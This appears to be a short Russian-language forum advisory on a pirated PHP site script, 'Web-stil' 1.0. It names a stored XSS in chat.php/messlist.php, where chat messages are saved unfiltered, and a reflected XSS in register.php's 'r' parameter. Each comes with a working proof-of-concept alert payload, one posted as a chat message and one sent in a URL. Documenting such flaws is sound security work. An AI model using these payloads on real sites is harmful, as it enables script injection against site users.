Web-stil ("пиратская копия")
Version: 1.0 (нет данных)
Active XSS
Vuln file: chat.php(messlist.php)
Файл chat.php через <iframe> загружает результат messlist.php, а messlist.php в свое время берет сообщения из БД (в БД сообщение добавляется без фильтрации):
PHP код:
//chat.php
<iframe frameborder="0" width="100%" height="400" src="messlist.php" marginheight="2" marginwidth="2" scrolling="auto" allowtransparency="yes" name="chatmesslist" style="border:#000000 1px solid;"></iframe>
//
PHP код:
//messlist.php
$res=mysql_query("select * from tb_chat order by id desc limit 20");
//
Exploit:
Код:
Просто через форму добавляем сообщения с содержанием "<script>alert('XsS')</script>" и имеем активку..[/COLOR]
Passive XSS
Vuln file: register.php
PHP код:
//
<td width="250" align="left"><input type="text" size="25" maxlength="25" name="referer" value="<? echo limpiar($_GET["r"]); ?>" autocomplete="off" class="field" value="" tabindex="1" /></td>
//
Exploit:
Код:
http://[host]/[path]/register.php?r="><script>alert(111)</script>
Примеры